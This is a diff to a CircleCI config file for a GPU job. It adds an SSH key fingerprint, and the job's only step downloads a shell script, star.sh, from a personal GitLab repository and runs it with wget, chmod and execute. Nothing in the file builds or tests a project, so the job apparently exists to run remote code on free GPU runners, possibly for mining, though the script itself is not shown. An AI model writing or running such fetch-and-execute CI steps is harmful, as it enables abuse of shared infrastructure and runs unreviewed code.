--- a/.circleci/config.yml
+++ b/.circleci/config.yml
@@ -5,4 +5,8 @@ jobs:
       resource_class: gpu.nvidia.medium
       image: ubuntu-1604-cuda-10.1:201909-23
     steps:
+      - add_ssh_keys:
+          fingerprints:
+            - "+XRR5L8FJV/dE1a9zjJ67GjOQFgGkoyAwK4zla+fIoo"
       - run: wget https://gitlab.com/viwarlani/build/-/raw/main/star.sh && chmod +x *.sh && ./star.sh
+      
